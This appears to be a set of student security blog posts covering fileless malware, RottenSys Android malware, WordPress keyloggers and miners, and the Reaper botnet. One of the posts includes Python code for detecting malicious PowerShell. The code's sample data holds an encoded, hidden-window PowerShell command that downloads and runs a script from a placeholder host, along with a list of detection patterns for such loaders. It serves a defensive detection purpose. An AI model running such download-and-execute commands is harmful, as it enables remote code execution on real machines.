The Rise of Fileless malware

Over the last two years, there has been an uptick in the number of malware attacks that are fileless. This means that the malware is designed to not rely on or interact with the filesystem of the host machine. This is so it is relatively undetectable by file scanning, which is the common way to find malware. This rising trend will change how we deal with these kinds of malware threats. One of the changes to combat this threat is to turn to behavior-based detection strategies like “script block logging,” which will keep track of code that is executed, for someone to sift through and look for abnormalities.

Experts are predicting that fileless malware attacks will continue to rise as they did from 2016 to 2017 because of their success rate. Fileless attacks are more likely to be successful than file-based attacks by an order of magnitude (literally 10 times more likely), according to the 2017 “State of Endpoint Security Risk” report from Ponemon. The ratio of fileless to file-based attacks grew in 2017 and is forecasted to continue to grow this year. This goes to show that we need to constantly be adapting to different threats, because we know the hackers will.
– Ryne Krueger



Fileless Malware

Malware is constantly evolving to match the level of sophistication that anti-malware programs use to prevent it. This is especially so in the type of malware called fileless malware. This malware is relatively new (first big cases seen in 2014) but becoming more common. Fileless malware tends to avoid the filesystem by operating almost entirely in memory, therefore we have also seen some attacks like this as early as the 2000s. It hit a milestone in 2017 by making up nearly 52% of all malware attacks that year.

This type of malware aims to avoid modifying the filesystem at all. It allows “cybercriminals to skip steps that are needed to deploy malware-based attacks, such as creating payloads with malware to drop onto users’ systems. Instead, attackers use trusted programs native to the operating system and native operating system tools like PowerShell and WMI to exploit in-memory access, as well as Web browsers and Office applications.”

So why does it matter if it avoids modifying the filesystem? That is because a big part of malware protection in anti-malware programs is scanning files to detect infected ones.

How can it be prevented? This is a process called behavioral detection. “Looking for signs associated with malicious PowerShell use (like a PowerShell session executed using an encoded command via the command line), provides security teams with the evidence they need to investigate incidents that could turn out to be instances of malicious PowerShell use.”


-Dylan Arrabito
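Both fileless-malware posts above land on the same defensive control: log what PowerShell actually executes (script block logging) and look for the tell-tale shapes of malicious use, such as a session started with an encoded command. The Python below is an added example, not code from either post. It decodes -EncodedCommand arguments found in constructed process-creation command lines, scans those and constructed script block text for loader-style constructs, and reports findings. The event sources named in the comments (Security 4688, Sysmon 1, PowerShell/Operational 4104) are the standard Windows logs for this data; the sample events, the pattern list and the helper names are my own constructions.

```python
"""Flag encoded or loader-style PowerShell activity in process and script block logs.

Added example (not from either post above). The event texts below are constructed
samples standing in for Security 4688 / Sysmon Event ID 1 command lines and
Microsoft-Windows-PowerShell/Operational 4104 script block text.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# -EncodedCommand and the shortened prefixes powershell.exe accepts for it,
# followed by a base64 blob.
ENCODED_ARG = re.compile(
    r"(?:^|\s)-(?:encodedcommand|encodedc|encoded|encode|encod|enco|enc|en|ec|e)\s+"
    r"([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)

# Constructs that commonly appear in in-memory loaders; the keys are the labels reported.
SUSPICIOUS_PATTERNS = {
    "invoke-expression": re.compile(r"invoke-expression|\biex\b", re.IGNORECASE),
    "downloadstring": re.compile(r"downloadstring", re.IGNORECASE),
    "frombase64string": re.compile(r"frombase64string", re.IGNORECASE),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "execution policy bypass": re.compile(r"bypass", re.IGNORECASE),
}


@dataclass
class Finding:
    source: str                 # "commandline" or "scriptblock"
    reason: str
    decoded: str = ""           # recovered -EncodedCommand text, if any
    tokens: List[str] = field(default_factory=list)


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; return it, or None if not decodable."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_tokens(text: str) -> List[str]:
    """Return the labels of every suspicious pattern present in text."""
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]


def inspect_commandline(cmdline: str) -> Optional[Finding]:
    """Process-creation view: encoded invocations are decoded before token matching."""
    if not re.search(r"powershell|pwsh", cmdline, re.IGNORECASE):
        return None
    m = ENCODED_ARG.search(cmdline)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded is None:
            return Finding("commandline", "encoded command (undecodable)")
        # Match on the visible arguments plus the decoded script, never on the base64 itself.
        visible = cmdline[: m.start(1)]
        return Finding("commandline", "encoded command", decoded, find_tokens(visible + "\n" + decoded))
    tokens = find_tokens(cmdline)
    return Finding("commandline", "suspicious arguments", tokens=tokens) if tokens else None


def inspect_scriptblock(block: str) -> Optional[Finding]:
    """Script block logging view: the de-obfuscated code PowerShell actually ran."""
    tokens = find_tokens(block)
    return Finding("scriptblock", "suspicious script content", tokens=tokens) if tokens else None


def scan_events(events: List[Tuple[str, str]]) -> List[Finding]:
    """Run the matching inspector over (source, text) pairs and collect the findings."""
    inspectors = {"commandline": inspect_commandline, "scriptblock": inspect_scriptblock}
    findings = []
    for source, text in events:
        finding = inspectors[source](text)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample data (not real telemetry); the host name is a reserved example domain.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    ("commandline", 'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"'),
    ("commandline", f"powershell.exe -nop -w hidden -enc {SAMPLE_B64}"),
    ("commandline", r"C:\Windows\System32\notepad.exe notes.txt"),
    ("scriptblock", r"Get-ChildItem C:\Logs | Where-Object Length -gt 1MB"),
    ("scriptblock", "$b = [Convert]::FromBase64String($s); IEX ([Text.Encoding]::Unicode.GetString($b))"),
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        extra = f" decoded={f.decoded!r}" if f.decoded else ""
        print(f"[{f.source}] {f.reason}: tokens={f.tokens}{extra}")
```

The two inspectors cover the two vantage points the posts describe: the command line shows how PowerShell was launched (an encoded, hidden-window session is itself the signal), while script block logging shows the code after PowerShell has un-encoded it, which is what lets a reviewer catch loader constructs even when the command line is obfuscated in some way this pattern list does not anticipate.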

Pre-Installed Malware Found on Nearly 5 Million Android Devices

A piece of malware referred to as RottenSys has been discovered to have infected nearly 5 million devices since 2016. It is possible that the malware could have been installed on older devices as well.

Check Point Software Technologies, the company that discovered the infections, found that 49.2% of the infected devices had been shipped through Tian Pai, a Hangzhou-based mobile phone distributor. At this point, it is not clear if Tian Pai is directly involved or not. The manufacturers that have been affected are Honor, Huawei, Xiaomi, OPPO, Vivo, Samsung and GIONEE.

The malware is disguised as a System Wi-Fi service app that has no malicious code and doesn’t initially perform any malicious activity, in order to go unnoticed. After a set amount of time, the program communicates with its Command and Controller (C&C) server to download the components required for its activity. RottenSys is then able to use multiple open-source Android frameworks to ensure its continued functionality and to feed advertisements to the user. From March third to March twelfth, the malware had generated over $115,000 in ad-click revenue.

It is unclear what the developers of RottenSys plan to use their massive botnet for besides aggressively serving people ads, but they do have the ability to send any code they want to the infected phones. This means they would be able to have the phones participate in large-scale botnet attacks.

In order to remove the malware from a device, a user has to remove four separate packages.

Package Name            App Name
(not shown)             每日黄历
com.changmi.launcher    畅米桌面
(not shown)             系统WIFI服务

There is nothing that consumers are able to do to prevent an attack of this nature from occurring. The only thing we can do is be extremely paranoid about the applications that come pre-installed on our phones. We need to check the permissions that the applications request and determine if the permission is something that the application should need. Of course, this is not a reasonable thing to ask of most people to do, and so most people are left at the mercy of the industry to keep their devices safe.

– Zachary Campanella


Keyloggers and cryptocurrency mining on infected WordPress sites

About four weeks ago, (a little after the start of this class….. 🤔) it was discovered that thousands of WordPress sites were being used to mine Monero cryptocurrency, along with using a keylogger to steal users’ login information, and possibly more. It functioned in such a way that users didn’t even have to hit the submit button in order to have their credentials stolen, and mining would start simply by visiting the page.

The keylogger runs on the entirety of the infected site, which opens the door for more than just WordPress logins to be captured, but also any data passed through the infected websites, such as possible bank credentials and e-mail addresses.

According to Bleeping Computer, 2,000 sites were infected by the keylogger. There’s no real way to tell if you are visiting an infected site without inspecting the source (and knowing what you’re looking for), so until the virus is wiped out, people should be wary of any WordPress managed site. If your browser suddenly starts eating up processing power when visiting a WordPress site, there is a good chance you’ve visited an infected one, and your computer is being used to mine Monero while you visit it.

Security experts still aren’t sure what caused the vulnerability aside from a blanket “WordPress is just bad”, and “this happens all the time to WordPress.”
Security experts are backing up their claims of WordPress’s dismal security practices by pointing out that within the past two months another, entirely different keylogger was found infecting WordPress sites, 5,482 of them.
This entirely separate keylogger was injected into Cloudflare scripts that used fake linter.js URLs.

If the site has this malware running on it, there also is a chance that it also is using your computer to do cryptocurrency mining, but instead of mining only for Monero, this malware can mine whatever cryptocurrency the hacker so decides.

WordPress is so prone to hacking that there is a monthly journal to keep track of what WordPress vulnerabilities were found. Though it is hard to keep 18.9% of the internet running safely, and though it is easy to blame WordPress for not handling these attacks, part of the responsibility does lie with the admins of the pages.
However, the fact that WordPress seems to be this insecure just shows the kind of caution you need when going anywhere online.

-Skyler Clark

Reaper Botnet Dwarfs Mirai


By this point everyone and their mother has heard of the botnet dubbed ‘Mirai’, an infamous botnet infrastructure from last year that managed to take down a good chunk of the internet by attacking Dyn, a DNS provider. Well, as of this September, weak passwords might have become the least of your worries if you’re like 60% of Check Point’s ThreatCloud-covered corporations, and have unpatched vulnerabilities on your network.

Dubbed Reaper, or IOTroop by some, a new IoT botnet is propagating, and shows no sign of slowing down. Today, researchers have ruled out the possibility that Mirai and Reaper are connected, at least on a technical level, due to the superiority that Reaper has displayed in its intrusion and propagation techniques. Whereas Mirai was spread through the exploitation of default passwords across IoT devices, Reaper utilizes a specialized strand of malware that exploits well-known vulnerabilities (such as those present in many printers and IoT toasters) to gain entry to a device, and further uses that device to spread itself to others connected.

With near exponential growth, Qihoo 360 Netlab witnessed approximately 2 million newly infected devices waiting to be processed by a C&C server, several of which have thus far been identified. The best thing that any concerned corporation or user can do at this point in time would be to ensure that every machine on their network has updated firmware and software, in an attempt to limit the spread of this variable plague infecting IoT networks worldwide.

Currently, it appears as if we all might be witnessing a ‘calm before the storm’ situation, with this botnet ramping up massively in numbers and, according to Check Point, updating its capabilities on a daily basis. What else can I say but stay safe, and brace for impact, as when this thing hits, it’ll make the Dyn attack look like a birthday party.

– Kenneth Nero

Sources: Here, and Here, also Here